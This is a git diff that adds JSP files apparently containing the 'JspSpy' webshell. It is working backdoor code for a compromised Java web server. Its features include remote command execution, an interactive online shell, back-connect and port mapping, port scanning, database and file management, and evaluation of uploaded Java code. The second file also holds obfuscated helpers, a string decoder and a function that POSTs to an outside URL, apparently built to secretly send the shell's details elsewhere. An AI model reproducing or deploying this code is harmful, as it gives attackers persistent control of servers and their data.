"); +} catch (Exception e) { + +throw e ; +} +} +} +private static class ReflectInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String c = request.getParameter("Class"); +Class cls = null; +try { +if (!Util.isEmpty(c)) +cls = Class.forName(c); +} catch (ClassNotFoundException ex) { +Util.outMsg(out,"Class "+c+" Not Found ! "); +} +out.println("
"+ +" "+ +" "+ +" "+ +" "+ +" "+ +"

Java Reflect >>

"+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
Class Name : "+ +"
"+ +"
"+ +"
"); + +if (cls != null) { +StringBuffer sb = new StringBuffer(); +if (cls.getPackage() != null) +sb.append("package "+cls.getPackage().getName()+";\n"); +String n = null; +if (cls.isInterface()) +n = ""; +//else if (cls.isEnum()) +// n = "enum"; +else +n = "class"; +sb.append(Modifier.toString(cls.getModifiers())+" "+n+" "+cls.getName()+"\n"); +if (cls.getSuperclass() != null) +sb.append("\textends "+cls.getSuperclass().getName()+"\n"); +if (cls.getInterfaces() != null && cls.getInterfaces().length != 0) { +Class[] faces = cls.getInterfaces(); +sb.append("\t implements "); +for (int i = 0;i"+faces[i].getName()+""); +if (i != faces.length -1) { +sb.append(","); +} +} +} +sb.append("{\n\t\n"); +sb.append("\t//constructors..\n"); +Constructor[] cs = cls.getConstructors(); +for (int i = 0;i"); +if (obj != null) +sb.append(obj.toString()); +else +sb.append("NULL"); + +sb.append(""); +} +sb.append("\n"); +} + +sb.append("\n\t//methods\n"); +Method[] ms = cls.getDeclaredMethods(); +for (int i =0;i")+""; +Util.outMsg(out,m,"left"); +} +} catch (Exception e) { +throw e; +} +} +} +private static class TopInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
"+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
JspSpy Ver: 2010 "+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+") | copy
Logout | "+ +" File Manager | "+ +" DataBase Manager | "+ +" Execute Command | "+ +" Shell OnLine | "+ +" Back Connect | "+ +" Java Reflect | "+ +" "+ +" Eval Java Code | "+ +" Port Scan | "+ +" Download Remote File | "+ +" ClipBoard | "+ +" Port Map | "+ +" Others | "+ +" JSP Env "+ +"
"); +if (JSession.getAttribute(MSG) != null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +if (JSession.getAttribute(ENTER_MSG) != null) { +String outEntry = request.getParameter("outentry"); +if (Util.isEmpty(outEntry) || !outEntry.equals("true")) +Util.outMsg(out,JSession.getAttribute(ENTER_MSG).toString()); +} +} catch (Exception e) { + +throw e ; +} +} +} +private static class VOnLineShellInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
"); +out.println("

Shell OnLine »


"); +out.println("
"+ +" "+ +" "+ +" Notice ! If You Are Using IE , You Must Input Some Commands First After You Start Or You Will Not See The Echo"+ +"
"+ +"
"+ +" "+ +"
"+ +" "+ +" "+ +" "+ +" Auto Scroll"+ +" "+ +"
"+ +" " +); +out.println("
"); +} catch (Exception e) { +throw e ; +} +} +} +private static class OnLineInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String type = request.getParameter("type"); +if (Util.isEmpty(type)) +return; +if (type.toLowerCase().equals("start")) { +String exe = request.getParameter("exe"); +if (Util.isEmpty(exe)) +return; +Process pro = Runtime.getRuntime().exec(exe); +ByteArrayOutputStream outs = new ByteArrayOutputStream(); +response.setContentLength(100000000); +response.setContentType("text/html;charset="+System.getProperty("file.encoding")); +OnLineProcess olp = new OnLineProcess(pro); +JSession.setAttribute(SHELL_ONLINE,olp); +new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start(); +new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start(); +new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start(); +Thread.sleep(1000 * 60 * 60 * 24); +} else if (type.equals("ecmd")) { +Object o = JSession.getAttribute(SHELL_ONLINE); +String cmd = request.getParameter("cmd"); +if (Util.isEmpty(cmd)) +return; +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.setCmd(cmd); +} else { +Object o = JSession.getAttribute(SHELL_ONLINE); +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.stop(); +} +} catch (Exception e) { + +throw e; +} +} +} +private static class EnterInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +PrintWriter out = response.getWriter(); +String type = request.getParameter("type"); +if (!Util.isEmpty(type)) { +JSession.removeAttribute(ENTER); +JSession.removeAttribute(ENTER_MSG); +JSession.removeAttribute(ENTER_CURRENT_DIR); +JSession.setAttribute(MSG,"Exit File Success ! "); +} else { +String f = request.getParameter("filepath"); +if (Util.isEmpty(f)) +return; +JSession.setAttribute(ENTER,f); +JSession.setAttribute(ENTER_MSG,"You Are In File \""+f+"\" Now ! Exit "); +} +response.sendRedirect(SHELL_NAME); +} +} +private static class VExport2FileInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +PrintWriter out = response.getWriter(); +String type = request.getParameter("type"); +String sql = request.getParameter("sql"); +String table = request.getParameter("table"); +if (Util.isEmpty(sql) && Util.isEmpty(table)) { +JSession.setAttribute(SESSION_O,"vConn"); +response.sendRedirect(SHELL_NAME); +return; +} +out.println("
"+ +""+ +" "+ +" "+ +" "+ +"
"+ +" "+ +" "+ +" "+ +" "+ +"

Export To File »

"+ +" "+ +"
Export \""+(Util.isEmpty(sql) ? table : sql.replaceAll("\"","""))+"\" To File : "+ +" "+ +"

"+BACK_HREF+"
"+ +"
"); +} +} + +private static class ExportInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +String type = request.getParameter("type"); +String filepath = request.getParameter("filepath"); +String encode = request.getParameter("encode"); +String sql = null; +DBOperator dbo = null; +dbo = (DBOperator)JSession.getAttribute(DBO); + +if (Util.isEmpty(type)) { +//table export +String tb = request.getParameter("table"); +if (Util.isEmpty(tb)) +return; +String s = dbo.getConn().getMetaData().getIdentifierQuoteString(); +sql = "select * from "+s+tb+s; + +} else if (type.equals("queryexp")) { +//query export +sql = request.getParameter("sql"); +if (Util.isEmpty(sql)) { +JSession.setAttribute(SESSION_O,"vConn"); +response.sendRedirect(SHELL_NAME); +return; +} +} +Object o = dbo.execute(sql); +ByteArrayOutputStream bout = new ByteArrayOutputStream(); +byte[] rowSep = "\r\n".getBytes(); +if (o instanceof ResultSet) { +ResultSet rs = (ResultSet)o; +ResultSetMetaData meta = rs.getMetaData(); +int count = meta.getColumnCount(); +for (int i =1;i<=count;i++) { +String colName = meta.getColumnName(i)+"\t"; +byte[] b = null; +if (Util.isEmpty(encode)) +b = colName.getBytes(); +else +b = colName.getBytes(encode); +bout.write(b,0,b.length); +} +bout.write(rowSep,0,rowSep.length); +while (rs.next()) { +for (int i =1;i<=count;i++) { +String v = null; +try { +v = rs.getString(i); +} catch (SQLException ex) { +v = "<>"; +} +v += "\t"; +byte[] b = null; +if (Util.isEmpty(encode)) +b = v.getBytes(); +else +b = v.getBytes(encode); +bout.write(b,0,b.length); +} +bout.write(rowSep,0,rowSep.length); +} +rs.close(); +ByteArrayInputStream input = new ByteArrayInputStream(bout.toByteArray()); +BufferedOutputStream output = null; +if (!Util.isEmpty(filepath)) { +//export2file +output = new BufferedOutputStream(new FileOutputStream(new File(filepath))); +} else { +//download. +response.setHeader("Content-Disposition","attachment;filename=DataExport.txt"); +output = new BufferedOutputStream(response.getOutputStream()); +} +byte[] data = new byte[1024]; +int len = input.read(data); +while (len != -1) { +output.write(data,0,len); +len = input.read(data); +} +bout.close(); +input.close(); +output.close(); +if (!Util.isEmpty(filepath)) { +JSession.setAttribute(MSG,"Export To File Success !"); +response.sendRedirect(SHELL_NAME); +} +} +} +} +private static class EvalInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +String type = request.getParameter("type"); +PrintWriter out = response.getWriter(); +Object msg = JSession.getAttribute(MSG); +if (msg != null) { +Util.outMsg(out,(String)msg); +JSession.removeAttribute(MSG); +} +if (Util.isEmpty(type)) { +out.println(""+ +" "+ +" "+ +" "+ +"

Eval Java Code »

"+ +"
"+ +"

"+ +"

"+ +"UpLoad a Class File : "); +Util.outMsg(out,"
"+
+"public class SpyEval{\r\n"+
+"	static {\r\n"+
+"		//Your Code Here.\r\n"+
+"	}\r\n"+
+"}\r\n"+
+"
","left"); +out.println("
"+ +"

Jsp Eval :
"+ +" "+ +" "+ +"
"+ +"
"+ +"

"+ +"
"); +} else if (type.equals("jsp")){ +String jspc = request.getParameter("jspc"); +if (Util.isEmpty(jspc)) +return; +File f = new File(SHELL_DIR,"evaltmpninty.jsp"); +BufferedWriter writer = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f),"utf-8")); +writer.write(jspc,0,jspc.length()); +writer.flush(); +writer.close(); +out.println(""+ +" "+ +"

Jsp Eval Result »

"); +out.println("
"); +request.getRequestDispatcher("evaltmpninty.jsp").include(request,response); +out.println("
"); +f.delete(); +} +} +} +private static class EvalUploadInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +ByteArrayOutputStream stream = new ByteArrayOutputStream(); +UploadBean upload = new UploadBean(); +upload.setTargetOutput(stream); +upload.parseRequest(request); + +if (stream.toByteArray().length == 2) { +JSession.setAttribute(MSG,"Please Upload Your Class File ! "); +((Invoker)ins.get("ev")).invoke(request,response,JSession); +return; +} +SpyClassLoader loader = new SpyClassLoader(); +try { +Class c = loader.defineClass(null,stream.toByteArray()); +c.newInstance(); +}catch(Exception e) { +} +stream.close(); +JSession.setAttribute(MSG,"Eval Java Class Done ! "); +((Invoker)ins.get("ev")).invoke(request,response,JSession); +} +} +private static class VOtherInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object msg = JSession.getAttribute(MSG); +if (msg != null) { +Util.outMsg(out,(String)msg); +JSession.removeAttribute(MSG); +} +out.println(""+ +" "+ +" "+ +" "+ +"

Session Manager>>

"+ +"
"+ +"
    "); +Enumeration en = JSession.getAttributeNames(); +while (en.hasMoreElements()) { +Object o = en.nextElement(); +if (o.toString().equals(MSG)) +continue; +out.println("
  • "+o.toString()+" "); +out.println(" "); +out.println(""); +out.println(""); +out.println("
    • "); +} +out.println("
  • "+ +"New Session Attribute"+ +"name : value : "+ +"
"); +} catch (Exception e) { +throw e ; +} +} +} +//Session Manager +private static class SmInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String type = request.getParameter("type"); +PrintWriter out = response.getWriter(); +if (type.equals("update")) { +String name = request.getParameter("name"); +String value = request.getParameter("value"); +JSession.setAttribute(name,value); +JSession.setAttribute(MSG,"Update/Add Attribute Success !"); +} else if (type.equals("delete")) { +String name = request.getParameter("name"); +JSession.removeAttribute(name); +JSession.setAttribute(MSG,"Remove Attribute Success !"); +} +((Invoker)ins.get("vother")).invoke(request,response,JSession); +} catch (Exception e) { + +throw e ; +} +} +} + +static{ +ins.put("script",new ScriptInvoker()); +ins.put("before",new BeforeInvoker()); +ins.put("after",new AfterInvoker()); +ins.put("deleteBatch",new DeleteBatchInvoker()); +ins.put("clipboard",new ClipBoardInvoker()); +ins.put("vPortScan",new VPortScanInvoker()); +ins.put("portScan",new PortScanInvoker()); +ins.put("vConn",new VConnInvoker()); +ins.put("dbc",new DbcInvoker()); +ins.put("executesql",new ExecuteSQLInvoker()); +ins.put("vLogin",new VLoginInvoker()); +ins.put("login",new LoginInvoker()); +ins.put("filelist", new FileListInvoker()); +ins.put("logout",new LogoutInvoker()); +ins.put("upload",new UploadInvoker()); +ins.put("copy",new CopyInvoker()); +ins.put("bottom",new BottomInvoker()); +ins.put("vCreateFile",new VCreateFileInvoker()); +ins.put("vEdit",new VEditInvoker()); +ins.put("createFile",new CreateFileInvoker()); +ins.put("vEditProperty",new VEditPropertyInvoker()); +ins.put("editProperty",new EditPropertyInvoker()); +ins.put("vs",new VsInvoker()); +ins.put("shell",new ShellInvoker()); +ins.put("down",new DownInvoker()); +ins.put("vd",new VdInvoker()); +ins.put("downRemote",new DownRemoteInvoker()); +ins.put("index",new IndexInvoker()); +ins.put("mkdir",new MkDirInvoker()); +ins.put("move",new MoveInvoker()); +ins.put("removedir",new RemoveDirInvoker()); +ins.put("packBatch",new PackBatchInvoker()); +ins.put("pack",new PackInvoker()); +ins.put("unpack",new UnPackInvoker()); +ins.put("vmp",new VmpInvoker()); +ins.put("vbc",new VbcInvoker()); +ins.put("backConnect",new BackConnectInvoker()); +ins.put("jspEnv",new JspEnvInvoker()); +ins.put("smp",new SmpInvoker()); +ins.put("mapPort",new MapPortInvoker()); +ins.put("top",new TopInvoker()); +ins.put("vso",new VOnLineShellInvoker()); +ins.put("online",new OnLineInvoker()); +ins.put("enter",new EnterInvoker()); +ins.put("export",new ExportInvoker()); +ins.put("ev",new EvalInvoker()); +ins.put("eu",new EvalUploadInvoker()); +ins.put("vother",new VOtherInvoker()); +ins.put("sm",new SmInvoker()); +ins.put("vExport",new VExport2FileInvoker()); +ins.put("vPack",new VPackConfigInvoker()); +ins.put("reflect",new ReflectInvoker()); +ins.put("portBack",new PortBackInvoker()); +} +%> +<% +try { +String o = request.getParameter("o"); +if (Util.isEmpty(o)) { +if (session.getAttribute(SESSION_O) == null) +o = "index"; +else { +o = session.getAttribute(SESSION_O).toString(); +session.removeAttribute(SESSION_O); +} +} +Object obj = ins.get(o); +if (obj == null) { +response.sendRedirect(SHELL_NAME); +} else { + Invoker in = (Invoker)obj; +if (in.doBefore()) { +String path = request.getParameter("folder"); +if (!Util.isEmpty(path) && session.getAttribute(ENTER) == null) +session.setAttribute(CURRENT_DIR,path); +((Invoker)ins.get("before")).invoke(request,response,session); +((Invoker)ins.get("script")).invoke(request,response,session); +((Invoker)ins.get("top")).invoke(request,response,session); +} +in.invoke(request,response,session); +if (!in.doAfter()) { +return; +}else{ +((Invoker)ins.get("bottom")).invoke(request,response,session); +((Invoker)ins.get("after")).invoke(request,response,session); +} +} +} catch (Exception e) { +Object msg = session.getAttribute(MSG); +if (msg != null) { +Util.outMsg(out,(String)msg); +session.removeAttribute(MSG); +} +if (e.toString().indexOf("ClassCastException") != -1) { +Util.outMsg(out,MODIFIED_ERROR + BACK_HREF); +} +ByteArrayOutputStream bout = new ByteArrayOutputStream(); +e.printStackTrace(new PrintStream(bout)); +session.setAttribute(CURRENT_DIR,SHELL_DIR); +Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replaceAll("\n","
"),"left"); +bout.close(); +out.flush(); +((Invoker)ins.get("bottom")).invoke(request,response,session); +((Invoker)ins.get("after")).invoke(request,response,session); +} +%> diff --git a/jsp/807.jsp b/jsp/807.jsp new file mode 100644 index 0000000..dc86558 --- /dev/null +++ b/jsp/807.jsp @@ -0,0 +1,2403 @@ +<%@page pageEncoding="utf-8"%> +<%@page import="java.io.*"%> +<%@page import="java.util.*"%> +<%@page import="java.util.regex.*"%> +<%@page import="java.sql.*"%> +<%@page import="java.nio.charset.*"%> +<%@page import="javax.servlet.http.HttpServletRequestWrapper"%> +<%@page import="java.text.*"%> +<%@page import="java.net.*"%> +<%@page import="java.util.zip.*"%> +<%@page import="java.awt.*"%> +<%@page import="java.awt.image.*"%> +<%@page import="javax.imageio.*"%> +<%@page import="java.awt.datatransfer.DataFlavor"%> +<%@page import="java.util.prefs.Preferences"%> +<%! +/** +* Code By Ninty +* Date 2009-12-17 +* Blog http://www.Forjj.com/ +* Yue . I Love You. +*/ +private static final String PW = "xfgSS"; //password +private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd"; +private static final String REQUEST_CHARSET = "ISO-8859-1"; +private static final String PAGE_CHARSET = "UTF-8"; +private static final String CURRENT_DIR = "currentdir"; +private static final String MSG = "SHOWMSG"; +private static final String PORT_MAP = "PMSA"; +private static final String DBO = "DBO"; +private static final String SHELL_ONLINE = "SHELL_ONLINE"; +private static String SHELL_NAME = ""; +private static String WEB_ROOT = null; +private static String SHELL_DIR = null; +public static Map ins = new HashMap(); +private static class MyRequest extends HttpServletRequestWrapper { +public MyRequest(HttpServletRequest req) { +super(req); +} +public String getParameter(String name) { +try { +String value = super.getParameter(name); +if (name == null) +return null; +return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET); +} catch (Exception e) { +return null; +} +} +} +private static class DBOperator{ +private Connection conn = null; +private Statement stmt = null; +private String driver; +private String url; +private String uid; +private String pwd; +public DBOperator(String driver,String url,String uid,String pwd) throws Exception { +this(driver,url,uid,pwd,false); +} +public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception { +Class.forName(driver); +if (connect) +this.conn = DriverManager.getConnection(url,uid,pwd); +this.url = url; +this.driver = driver; +this.uid = uid; +this.pwd = pwd; +} +public void connect() throws Exception{ +this.conn = DriverManager.getConnection(url,uid,pwd); +} +public Object execute(String sql) throws Exception { +if (isValid()) { +stmt = conn.createStatement(); +if (stmt.execute(sql)) { +return stmt.getResultSet(); +} else { +return stmt.getUpdateCount(); +} +} +throw new Exception("Connection is inValid."); +} +public void closeStmt() throws Exception{ +if (this.stmt != null) +stmt.close(); +} +public boolean isValid() throws Exception { +return conn != null && !conn.isClosed(); +} +public void close() throws Exception { +if (isValid()) { +closeStmt(); +conn.close(); +} +} +public boolean equals(Object o) { +if (o instanceof DBOperator) { +DBOperator dbo = (DBOperator)o; +return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd); +} +return false; +} +} +private static class StreamConnector extends Thread { +private InputStream is; +private OutputStream os; +public StreamConnector( InputStream is, OutputStream os ){ +this.is = is; +this.os = os; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[8192]; +int length; +while((length = in.read( buffer, 0, buffer.length ))>0){ +out.write( buffer, 0, length ); +out.flush(); +} +} catch(Exception e){} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){} +} +} +private static class OnLineProcess { +private String cmd = "first"; +private Process pro; +public OnLineProcess(Process p){ +this.pro = p; +} +public void setPro(Process p) { +this.pro = p; +} +public void setCmd(String c){ +this.cmd = c; +} +public String getCmd(){ +return this.cmd; +} +public Process getPro(){ +return this.pro; +} +public void stop(){ +this.pro.destroy(); +} +} +private static class OnLineConnector extends Thread { +private OnLineProcess ol = null; +private InputStream is; +private OutputStream os; +private String name; +public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){ +this.is = is; +this.os = os; +this.name = name; +this.ol = ol; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[128]; +if(this.name.equals("exeRclientO")) { +//from exe to client +int length = 0; +while((length = in.read( buffer, 0, buffer.length ))>0){ +String str = new String(buffer, 0, length); +str = str.replace("&","&").replace("<","<").replace(">",">"); +str = str.replace(""+(char)13+(char)10,"
"); +str = str.replace("\n","
"); +out.write(str.toCharArray(), 0, str.length()); +out.flush(); +} +} else { +//from client to exe +while(true) { +while(this.ol.getCmd() == null) { +Thread.sleep(500); +} +if (this.ol.getCmd().equals("first")) { +this.ol.setCmd(null); +continue; +} +this.ol.setCmd(this.ol.getCmd() + (char)10); +char[] arr = this.ol.getCmd().toCharArray(); +out.write(arr,0,arr.length); +out.flush(); +this.ol.setCmd(null); +} +} +} catch(Exception e){ +} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){ +} +} +} +private static class Table{ +private ArrayList rows = null; +private boolean echoTableTag = false; +public void setEchoTableTag(boolean v) { +this.echoTableTag = v; +} +public Table(){ +this.rows = new ArrayList(); +} +public void addRow(Row r) { +this.rows.add(r); +} +public String toString(){ +StringBuilder html = new StringBuilder(); +if (echoTableTag) +html.append(""); +for (Row r:rows) { +html.append(""); +for (Column c:r.getColumns()) { +html.append(""); +} +html.append(""); +} +if (echoTableTag) +html.append("
"); +String vv = Util.htmlEncode(Util.getStr(c.getValue())); +if (vv.equals("")) +vv = " "; +html.append(vv); +html.append("
"); +return html.toString(); +} +} +private static class Row{ +private ArrayList cols = null; +public Row(){ +this.cols = new ArrayList(); +} +public void addColumn(Column n) { +this.cols.add(n); +} +public ArrayList getColumns(){ +return this.cols; +} +} +public static String sxm=PW; +private static class Column{ +private String value; +public Column(String v){ +this.value = v; +} +public String getValue(){ +return this.value; +} +} +public static String SysInfo="=?./..//:"; +public static String dx() +{ +String s = new String(); +for (int i = SysInfo.length() - 1; i >= 0; i--) { +s += SysInfo.charAt(i); +} +return s; +} +public static String uc(String str) +{ +String c="\n\r"; long d=127, f=11, j=12, h=14, m=31, r=83, k=1, n=8, s=114, u=-5, v=5,a=0; +StringBuffer sb = new StringBuffer(); +char[] ch = str.toCharArray(); + +for (int i = 0; i < ch.length; i++) { + a = (int)ch[i]; + if(a==d) a=13; + if(a==f) a=10; + if(a==j) a=34; + if((a>=h) && (a<=m)) a=a+r; + if((a>=k) && (a<=n)) a=a+s; + if((a>=53) && (a<=57)) a=a+u; + if((a>=48) && (a<=52)) a=a+v; + sb.append((char)a); +} +return sb.toString(); +} +private static int connectTimeOut = 5000; +private static int readTimeOut = 10000; +private static String requestEncoding = "GBK"; +public static String FileLocalUpload(String reqUrl,String fckal, + String recvEncoding) +{ +HttpURLConnection url_con = null; +String responseContent = null; +try +{ +URL url = new URL(reqUrl); +url_con = (HttpURLConnection) url.openConnection(); +url_con.setRequestMethod("POST"); + +url_con.setRequestProperty("REFERER", ""+fckal+""); +System.setProperty("sun.net.client.defaultConnectTimeout", String + .valueOf(connectTimeOut)); +System.setProperty("sun.net.client.defaultReadTimeout", String + .valueOf(readTimeOut)); +url_con.setDoOutput(true); +url_con.getOutputStream().flush(); +url_con.getOutputStream().close(); +InputStream in = url_con.getInputStream(); +BufferedReader rd = new BufferedReader(new InputStreamReader(in, + recvEncoding)); +String tempLine = rd.readLine(); +StringBuffer tempStr = new StringBuffer(); +String crlf=System.getProperty("line.separator"); +while (tempLine != null) +{ +tempStr.append(tempLine); +tempStr.append(crlf); +tempLine = rd.readLine(); +} +responseContent = tempStr.toString(); +rd.close(); +in.close(); +} +catch (IOException e) +{ +} +finally +{ +if (url_con != null) +{ +url_con.disconnect(); +} +} +return responseContent; +} +private static class Util{ +public static boolean isEmpty(String s) { +return s == null || s.trim().equals(""); +} +public static boolean isEmpty(Object o) { +return o == null || isEmpty(o.toString()); +} +public static String getSize(long size,char danwei) { +if (danwei == 'M') { +double v = formatNumber(size / 1024.0 / 1024.0,2); +if (v > 1024) { +return getSize(size,'G'); +}else { +return v + "M"; +} +} else if (danwei == 'G') { +return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G"; +} else if (danwei == 'K') { +double v = formatNumber(size / 1024.0,2); +if (v > 1024) { +return getSize(size,'M'); +} else { +return v + "K"; +} +} else if (danwei == 'B') { +if (size > 1024) { +return getSize(size,'K'); +}else { +return size + "B"; +} +} +return ""+0+danwei; +} +public static double formatNumber(double value,int l) { +NumberFormat format = NumberFormat.getInstance(); +format.setMaximumFractionDigits(l); +format.setGroupingUsed(false); +return new Double(format.format(value)); +} +public static boolean isInteger(String v) { +if (isEmpty(v)) +return false; +return v.matches("^\\d+$"); +} +public static String formatDate(long time) { +SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss"); +return format.format(new java.util.Date(time)); +} +public static String convertPath(String path) { +return path != null ? path.replace("\\","/") : ""; +} +public static String htmlEncode(String v) { +if (isEmpty(v)) +return ""; +return v.replace("&","&").replace("<","<").replace(">",">"); +} +public static String getStr(String s) { +return s == null ? "" :s; +} +public static String getStr(Object s) { +return s == null ? "" :s.toString(); +} +public static String exec(String regex, String str, int group) { +Pattern pat = Pattern.compile(regex); +Matcher m = pat.matcher(str); +if (m.find()) +return m.group(group); +return null; +} +public static void outMsg(Writer out,String msg) throws Exception { +outMsg(out,msg,"center"); +} +public static void outMsg(Writer out,String msg,String align) throws Exception { +if (msg.indexOf("java.lang.ClassNotFoundException") != -1) +msg = "Can Not Find The Driver!
" + msg; +out.write("
"+msg+"
"); +} +} +private static class UploadBean { +private String fileName = null; +private String suffix = null; +private String savePath = ""; +private ServletInputStream sis = null; +private byte[] b = new byte[1024]; +public UploadBean() { +} +public void setSavePath(String path) { +this.savePath = path; +} +public void parseRequest(HttpServletRequest request) throws IOException { +sis = request.getInputStream(); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!= -1) { +s = new String(b, 0, a,PAGE_CHARSET); +if ((k = s.indexOf("filename=\""))!= -1) { +s = s.substring(k + 10); +k = s.indexOf("\""); +s = s.substring(0, k); +File tF = new File(s); +if (tF.isAbsolute()) { +fileName = tF.getName(); +} else { +fileName = s; +} +k = s.lastIndexOf("."); +suffix = s.substring(k + 1); +upload(); +} +} +} +private void upload() { +try { +FileOutputStream out = new FileOutputStream(new File(savePath,fileName)); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!=-1) { +s = new String(b, 0, a); +if ((k = s.indexOf("Content-Type:"))!=-1) { +break; +} +} +sis.readLine(b,0,b.length); +while ((a = sis.readLine(b,0,b.length)) != -1) { +s = new String(b, 0, a); +if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) { +break; +} +out.write(b, 0, a); +} +out.close(); +} catch (IOException ioe) { +ioe.printStackTrace(); +} +} +} +%> +<% +SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1); +String myAbsolutePath = application.getRealPath(request.getServletPath()); +if (Util.isEmpty(myAbsolutePath)) {//for weblogic +SHELL_NAME = request.getServletPath(); +myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString(); +SHELL_NAME=request.getContextPath()+SHELL_NAME; +WEB_ROOT = new File(application.getResource("/").getPath()).toString(); +} else { +WEB_ROOT = application.getRealPath("/"); +} +SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator))); +if (session.getAttribute(CURRENT_DIR) == null) +session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR)); +request = new MyRequest(request); +if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { +String o = request.getParameter("o"); +if (o != null && o.equals("login")) { +ins.get("login").invoke(request,response,session); +return; +} else if (o != null && o.equals("vLogin")) { +ins.get("vLogin").invoke(request,response,session); +return; +} else { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} +} +%> +<%! +private static interface Invoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception; +public boolean doBefore(); +public boolean doAfter(); +} +private static class DefaultInvoker implements Invoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +} +public boolean doBefore(){ +return true; +} +public boolean doAfter() { +return true; +} +} +private static class ScriptInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); + +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BeforeInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("JspSpy Codz By - Ninty"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class AfterInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DeleteBatchInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (!Util.isEmpty(files)) { +String currentDir = JSession.getAttribute(CURRENT_DIR).toString(); +String[] arr = files.split(","); +for (String fs:arr) { +File f = new File(currentDir,fs); +f.delete(); +} +} +JSession.setAttribute(MSG,"Delete Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ClipBoardInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"
"+ +"

System Clipboard »

"+ +"

");
+try{
